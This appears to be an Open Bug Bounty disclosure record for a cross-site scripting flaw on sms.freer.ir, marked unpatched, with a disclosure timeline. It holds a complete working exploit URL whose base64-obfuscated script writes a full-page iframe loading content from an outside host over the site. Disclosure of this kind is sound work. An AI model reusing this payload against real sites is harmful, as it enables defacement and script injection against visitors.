sms.freer.ir XSS vulnerability

2015-07-08T12:00:00
ID OBB:70576
Type openbugbounty
Reporter sToRm
Modified 2015-07-08T12:03:00

Description

Vulnerable URL:
http://sms.freer.ir/gateway/index.php/1%22%3E%3C/a%3E%3C/div%3E%3Cscript%3Ealert%28%22XSSPOSED%22%29;document.write%28atob%28%27PGlmcmFtZSBzdHlsZT0icG9zaXRpb246Zml4ZWQ7dG9wOjA7bGVmdDowO3dpZHRoOjEwMCU7bWluLWhlaWdodDoxMDAwcHg7aGVpZ2h0OjEwMCU7Ym9yZGVyOm5vbmU7ei1pbmRleDo5OTkiIHNyYz0iaHR0cDovL3d3dy5zaWNoZXJoZWl0LW9ubGluZS5vcmcveHRlcm5hbC9zdG9ybS5odG1sIj48L2lmcmFtZT4=%27%29%29;%3C/script%3E%3C!--
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 25.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 2
VIP website status:| No
Check sms.freer.ir SSL connection:| (Grade: C)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 8 July, 2015 12:00 GMT
Vulnerability existence verified and confirmed| 8 July, 2015 12:03 GMT